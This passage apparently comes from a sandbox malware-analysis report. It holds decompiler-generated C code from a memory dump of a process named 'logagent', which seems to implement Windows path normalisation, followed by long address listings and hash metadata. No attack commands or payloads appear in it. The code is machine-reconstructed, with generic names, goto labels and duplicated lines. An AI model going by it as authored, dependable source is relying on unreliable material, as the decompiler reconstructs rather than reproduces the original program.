															_pop(_t387);
															return E051FB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                              0x051d6e30
                                              0x051d6e35
                                              0x051d6e37
                                              0x051d6e3c
                                              0x051d6e47
                                              0x051d6e4b
                                              0x051d6e50
                                              0x051d6e53
                                              0x051d6e55
                                              0x051d6e5b
                                              0x051d6e5f
                                              0x051d6e65
                                              0x051d6e68
                                              0x051d6e6a
                                              0x051d6e6d
                                              0x051d6e70
                                              0x051d6e73
                                              0x051d6e76
                                              0x051d6e79
                                              0x051d6e7c
                                              0x051d6e7f
                                              0x051d6e84
                                              0x051d710f
                                              0x051d710f
                                              0x051d6e8c
                                              0x051d6e8e
                                              0x051d6e8e
                                              0x051d6e97
                                              0x0521f5d3
                                              0x0521f5d3
                                              0x051d6e9d
                                              0x051d6ea3
                                              0x051d6eaa
                                              0x051d6ead
                                              0x051d6eb2
                                              0x051d6eb4
                                              0x051d6eb7
                                              0x051d7466
                                              0x051d7466
                                              0x00000000
                                              0x051d6ebd
                                              0x051d6ebd
                                              0x051d6ec4
                                              0x051d6eca
                                              0x051d6ecc
                                              0x051d6ecf
                                              0x051d6ed2
                                              0x051d6ede
                                              0x0521f5df
                                              0x0521f5e0
                                              0x00000000
                                              0x0521f5e0
                                              0x051d6ee6
                                              0x00000000
                                              0x00000000
                                              0x051d6eec
                                              0x051d6ef3
                                              0x051d7181
                                              0x051d6f02
                                              0x051d6f02
                                              0x051d6f02
                                              0x051d6f0b
                                              0x051d6f0d
                                              0x051d6f10
                                              0x051d6f17
                                              0x051d6f21
                                              0x051d6f24
                                              0x051d6f2d
                                              0x051d6f31
                                              0x051d6f36
                                              0x051d6f3d
                                              0x051d7413
                                              0x051d7416
                                              0x051d7419
                                              0x051d741c
                                              0x051d7421
                                              0x051d742b
                                              0x051d742b
                                              0x051d742e
                                              0x051d7439
                                              0x0521f60b
                                              0x0521f60b
                                              0x0521f615
                                              0x0521f619
                                              0x051d743f
                                              0x051d7447
                                              0x051d7454
                                              0x051d745a
                                              0x051d745f
                                              0x051d745f
                                              0x00000000
                                              0x051d7439
                                              0x051d7425
                                              0x0521f5e9
                                              0x0521f5ed
                                              0x0521f5f4
                                              0x00000000
                                              0x00000000
                                              0x0521f5fd
                                              0x00000000
                                              0x00000000
                                              0x0521f603
                                              0x0521f603
                                              0x00000000
                                              0x051d6f43
                                              0x051d6f43
                                              0x051d6f45
                                              0x051d6f48
                                              0x051d6f4e
                                              0x051d6f65
                                              0x051d6f68
                                              0x051d721f
                                              0x051d6f83
                                              0x051d6f86
                                              0x051d72dc
                                              0x051d72dc
                                              0x051d6f9e
                                              0x051d6fa1
                                              0x051d6fa3
                                              0x051d6fa5
                                              0x051d6fa8
                                              0x051d6fab
                                              0x051d6fae
                                              0x051d6fb1
                                              0x051d6fb4
                                              0x051d6fb6
                                              0x051d6fb9
                                              0x051d6fbf
                                              0x051d718a
                                              0x051d718e
                                              0x0521f831
                                              0x0521f831
                                              0x0521f833
                                              0x0521f836
                                              0x00000000
                                              0x0521f836
                                              0x051d7194
                                              0x00000000
                                              0x0521f658
                                              0x0521f658
                                              0x0521f65a
                                              0x0521f65d
                                              0x0521f662
                                              0x0521f662
                                              0x0521f665
                                              0x0521f667
                                              0x00000000
                                              0x00000000
                                              0x0521f669
                                              0x0521f66c
                                              0x0521f670
                                              0x0521f673
                                              0x0521f67a
                                              0x0521f67a
                                              0x0521f67b
                                              0x0521f67e
                                              0x0521f681
                                              0x00000000
                                              0x00000000
                                              0x0521f683
                                              0x0521f683
                                              0x00000000
                                              0x0521f683
                                              0x0521f675
                                              0x0521f678
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521f678
                                              0x0521f686
                                              0x0521f688
                                              0x0521f68b
                                              0x0521f68e
                                              0x0521f691
                                              0x0521f694
                                              0x0521f698
                                              0x0521f69c
                                              0x0521f6a0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d7397
                                              0x051d739c
                                              0x051d739f
                                              0x051d73a3
                                              0x051d73a5
                                              0x0521f6bb
                                              0x0521f6c1
                                              0x0521f6c4
                                              0x051d73ab
                                              0x051d73ab
                                              0x051d73ab
                                              0x051d73b1
                                              0x051d73b5
                                              0x051d73ba
                                              0x051d73c0
                                              0x051d73c3
                                              0x051d73c7
                                              0x051d73cc
                                              0x051d73d0
                                              0x051d73d3
                                              0x0521f6cc
                                              0x0521f6d4
                                              0x0521f6d9
                                              0x0521f6dd
                                              0x0521f6e1
                                              0x0521f6e5
                                              0x0521f6f0
                                              0x0521f6fc
                                              0x0521f700
                                              0x0521f709
                                              0x0521f70e
                                              0x0521f710
                                              0x0521f784
                                              0x0521f788
                                              0x0521f78b
                                              0x0521f78e
                                              0x0521f790
                                              0x0521f792
                                              0x0521f795
                                              0x0521f798
                                              0x0521f7b7
                                              0x0521f7b7
                                              0x0521f7ba
                                              0x0521f7ba
                                              0x00000000
                                              0x0521f7ba
                                              0x0521f79a
                                              0x0521f79d
                                              0x00000000
                                              0x00000000
                                              0x0521f79f
                                              0x0521f7a4
                                              0x0521f7a7
                                              0x0521f7ab
                                              0x0521f7ae
                                              0x0521f7b1
                                              0x00000000
                                              0x0521f7b1
                                              0x0521f712
                                              0x0521f717
                                              0x0521f74c
                                              0x0521f74e
                                              0x0521f752
                                              0x0521f756
                                              0x0521f75d
                                              0x0521f761
                                              0x0521f764
                                              0x0521f76c
                                              0x0521f771
                                              0x0521f775
                                              0x0521f778
                                              0x0521f77c
                                              0x00000000
                                              0x0521f77c
                                              0x0521f719
                                              0x0521f71d
                                              0x0521f720
                                              0x0521f723
                                              0x0521f726
                                              0x0521f729
                                              0x0521f72e
                                              0x0521f740
                                              0x0521f744
                                              0x00000000
                                              0x0521f744
                                              0x0521f730
                                              0x0521f732
                                              0x0521f735
                                              0x0521f738
                                              0x00000000
                                              0x051d73d9
                                              0x051d73d9
                                              0x051d73db
                                              0x051d73de
                                              0x051d73e1
                                              0x051d73e4
                                              0x051d73e7
                                              0x051d73ea
                                              0x051d73ef
                                              0x051d73f2
                                              0x051d73f6
                                              0x051d73f9
                                              0x051d73f9
                                              0x051d73fe
                                              0x051d7401
                                              0x051d7406
                                              0x051d7409
                                              0x00000000
                                              0x051d7409
                                              0x00000000
                                              0x0521f7c5
                                              0x0521f7ca
                                              0x0521f7cd
                                              0x0521f7d1
                                              0x0521f7d3
                                              0x0521f7da
                                              0x0521f7e0
                                              0x0521f7e3
                                              0x0521f7e3
                                              0x0521f7e6
                                              0x0521f7d5
                                              0x0521f7d5
                                              0x0521f7d5
                                              0x0521f7e9
                                              0x0521f7eb
                                              0x0521f7f0
                                              0x0521f7f3
                                              0x0521f7f5
                                              0x0521f7f8
                                              0x0521f7fb
                                              0x0521f7fe
                                              0x0521f801
                                              0x0521f80f
                                              0x0521f814
                                              0x0521f803
                                              0x0521f803
                                              0x0521f806
                                              0x0521f806
                                              0x00000000
                                              0x00000000
                                              0x051d719d
                                              0x051d71a2
                                              0x051d71a5
                                              0x051d71a9
                                              0x051d71ab
                                              0x0521f826
                                              0x0521f829
                                              0x051d71b1
                                              0x051d71b1
                                              0x051d71ba
                                              0x051d71ba
                                              0x051d71bf
                                              0x051d71c5
                                              0x051d71cf
                                              0x051d71d2
                                              0x051d71d8
                                              0x051d71dd
                                              0x051d71e4
                                              0x051d71e7
                                              0x00000000
                                              0x00000000
                                              0x051d7275
                                              0x051d727a
                                              0x051d727d
                                              0x051d727f
                                              0x051d7282
                                              0x051d7284
                                              0x0521f6a8
                                              0x0521f6aa
                                              0x0521f6aa
                                              0x051d728a
                                              0x051d728f
                                              0x051d7292
                                              0x051d7297
                                              0x051d729a
                                              0x051d729d
                                              0x051d72a0
                                              0x051d72a5
                                              0x051d72a9
                                              0x051d72ac
                                              0x051d72af
                                              0x051d72b2
                                              0x051d72b5
                                              0x051d72b7
                                              0x051d72ba
                                              0x051d72be
                                              0x051d72be
                                              0x051d72c2
                                              0x051d72c5
                                              0x051d72c8
                                              0x0521f6b2
                                              0x0521f6b2
                                              0x00000000
                                              0x00000000
                                              0x051d6fc5
                                              0x051d6fc5
                                              0x051d6fcc
                                              0x051d6fd8
                                              0x051d6fda
                                              0x051d6fdd
                                              0x051d6fe3
                                              0x051d7162
                                              0x0521f845
                                              0x00000000
                                              0x00000000
                                              0x0521f84e
                                              0x0521f8c4
                                              0x0521f8c8
                                              0x0521f8cb
                                              0x0521f8ce
                                              0x051d70e0
                                              0x051d70e0
                                              0x051d70e3
                                              0x051d70e3
                                              0x051d70ea
                                              0x051d70ef
                                              0x051d70f1
                                              0x051d70f4
                                              0x051d70fc
                                              0x051d70fd
                                              0x051d70fe
                                              0x051d710c
                                              0x051d710c
                                              0x0521f850
                                              0x0521f858
                                              0x0521f87a
                                              0x0521f88a
                                              0x0521f88d
                                              0x0521f890
                                              0x0521f893
                                              0x0521f895
                                              0x0521f898
                                              0x0521f8a4
                                              0x0521f8ad
                                              0x0521f8b0
                                              0x0521f8b3
                                              0x0521f8b3
                                              0x0521f8a4
                                              0x051d6fec
                                              0x051d6fec
                                              0x051d6fee
                                              0x00000000
                                              0x051d6ff1
                                              0x051d6ff8
                                              0x00000000
                                              0x051d6ffe
                                              0x051d7004
                                              0x051d7006
                                              0x051d7006
                                              0x051d7010
                                              0x051d7017
                                              0x051d701e
                                              0x051d7072
                                              0x051d7074
                                              0x051d707e
                                              0x051d7083
                                              0x051d7087
                                              0x051d7088
                                              0x051d706c
                                              0x051d706c
                                              0x051d706d
                                              0x00000000
                                              0x051d706d
                                              0x051d707c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d707c
                                              0x051d7020
                                              0x051d7023
                                              0x051d71ef
                                              0x051d71ef
                                              0x051d71f2
                                              0x051d71f7
                                              0x00000000
                                              0x00000000
                                              0x051d71fd
                                              0x051d7200
                                              0x051d7205
                                              0x051d720b
                                              0x051d720e
                                              0x051d72eb
                                              0x00000000
                                              0x00000000
                                              0x051d72f6
                                              0x00000000
                                              0x051d7030
                                              0x051d7037
                                              0x051d703e
                                              0x051d7055
                                              0x051d705a
                                              0x051d7062
                                              0x0521f908
                                              0x0521f90e
                                              0x0521f90f
                                              0x0521f90f
                                              0x0521f908
                                              0x051d7062
                                              0x051d705a
                                              0x00000000
                                              0x051d7045
                                              0x051d7045
                                              0x051d7049
                                              0x051d704a
                                              0x051d704d
                                              0x051d704e
                                              0x00000000
                                              0x051d704e
                                              0x051d703e
                                              0x051d7068
                                              0x051d7069
                                              0x00000000
                                              0x051d7069
                                              0x051d72fc
                                              0x051d7301
                                              0x051d7304
                                              0x051d7314
                                              0x051d7314
                                              0x051d7319
                                              0x00000000
                                              0x00000000
                                              0x051d7325
                                              0x051d732d
                                              0x051d7330
                                              0x051d7356
                                              0x051d7357
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d7332
                                              0x051d7332
                                              0x051d7337
                                              0x00000000
                                              0x00000000
                                              0x051d7343
                                              0x051d734b
                                              0x051d734e
                                              0x051d7361
                                              0x00000000
                                              0x00000000
                                              0x051d7367
                                              0x051d7367
                                              0x051d7368
                                              0x00000000
                                              0x051d7368
                                              0x051d7350
                                              0x051d7351
                                              0x051d7351
                                              0x00000000
                                              0x051d7332
                                              0x0521f8f9
                                              0x0521f8f9
                                              0x0521f8fa
                                              0x00000000
                                              0x0521f8fa
                                              0x051d7306
                                              0x051d730e
                                              0x0521f8ee
                                              0x00000000
                                              0x00000000
                                              0x0521f8f4
                                              0x00000000
                                              0x051d730e
                                              0x051d7214
                                              0x051d7214
                                              0x051d7217
                                              0x00000000
                                              0x051d7217
                                              0x051d702c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d702c
                                              0x051d708d
                                              0x051d7094
                                              0x051d7098
                                              0x051d70a0
                                              0x051d738c
                                              0x051d738d
                                              0x051d738d
                                              0x051d70a0
                                              0x051d7098
                                              0x051d70a6
                                              0x051d70ab
                                              0x051d70b3
                                              0x051d70b5
                                              0x051d70cd
                                              0x051d70cd
                                              0x051d70d0
                                              0x051d70d8
                                              0x051d711a
                                              0x051d711c
                                              0x051d711c
                                              0x051d7121
                                              0x00000000
                                              0x00000000
                                              0x051d7129
                                              0x00000000
                                              0x00000000
                                              0x051d712b
                                              0x051d712b
                                              0x051d7130
                                              0x051d737e
                                              0x051d7381
                                              0x00000000
                                              0x051d7381
                                              0x051d7138
                                              0x00000000
                                              0x00000000
                                              0x051d7144
                                              0x051d7144
                                              0x051d70da
                                              0x051d70da
                                              0x051d70dd
                                              0x00000000
                                              0x051d70dd
                                              0x051d70b7
                                              0x051d70b8
                                              0x051d70bb
                                              0x051d70c2
                                              0x00000000
                                              0x00000000
                                              0x051d70c7
                                              0x00000000
                                              0x00000000
                                              0x051d70c9
                                              0x051d70ca
                                              0x00000000
                                              0x051d70ad
                                              0x051d70ad
                                              0x051d70af
                                              0x00000000
                                              0x051d70af
                                              0x051d7148
                                              0x051d714d
                                              0x0521f8e2
                                              0x0521f8e2
                                              0x051d7153
                                              0x051d7154
                                              0x051d7157
                                              0x00000000
                                              0x051d7157
                                              0x0521f87c
                                              0x0521f87f
                                              0x0521f882
                                              0x00000000
                                              0x0521f882
                                              0x0521f85e
                                              0x00000000
                                              0x00000000
                                              0x0521f864
                                              0x0521f869
                                              0x0521f86c
                                              0x00000000
                                              0x0521f86c
                                              0x051d7168
                                              0x051d7170
                                              0x0521f8d6
                                              0x0521f8d6
                                              0x051d7176
                                              0x051d7179
                                              0x00000000
                                              0x051d7179
                                              0x051d6fe9
                                              0x051d6fe9
                                              0x00000000
                                              0x051d6fe9
                                              0x051d6fbf
                                              0x051d6f8c
                                              0x051d6f93
                                              0x051d72d6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d72d6
                                              0x051d6f99
                                              0x051d6f99
                                              0x051d6f99
                                              0x00000000
                                              0x051d6f68
                                              0x051d6f50
                                              0x051d6f56
                                              0x051d722c
                                              0x0521f629
                                              0x0521f629
                                              0x00000000
                                              0x0521f629
                                              0x051d7232
                                              0x051d7239
                                              0x0521f623
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521f623
                                              0x051d723f
                                              0x051d7242
                                              0x0521f64e
                                              0x0521f64e
                                              0x00000000
                                              0x0521f64e
                                              0x051d7248
                                              0x051d724f
                                              0x051d7373
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d7379
                                              0x051d7255
                                              0x051d7258
                                              0x0521f63c
                                              0x0521f648
                                              0x00000000
                                              0x0521f648
                                              0x051d725e
                                              0x051d7265
                                              0x0521f636
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521f636
                                              0x051d726b
                                              0x051d726b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051d6f56
                                              0x051d6f3d
                                              0x051d6ed2
                                              0x00000000
                                              0x051d6ec4

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e9153b078f541732bc3373f4fcf561edaa9bd67073f9057badad9430b68fe8a2
                                              • Instruction ID: 58b7aa39da9685fb8e86ddf134db03d06610918fb548fccc77eff849d011d6f2
                                              • Opcode Fuzzy Hash: e9153b078f541732bc3373f4fcf561edaa9bd67073f9057badad9430b68fe8a2
                                              • Instruction Fuzzy Hash: 9D026B71D182559BCB28CF98C594BBDF7B2FF45700F66412EE816AB2D0E7709881CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D4120 Relevance: .4, Instructions: 444COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E051D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x52ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E051EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E051D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L051D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E051D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M051D45F8))) {
												case 0:
													_v568 = 0x5191078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x51911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L051D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E051FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
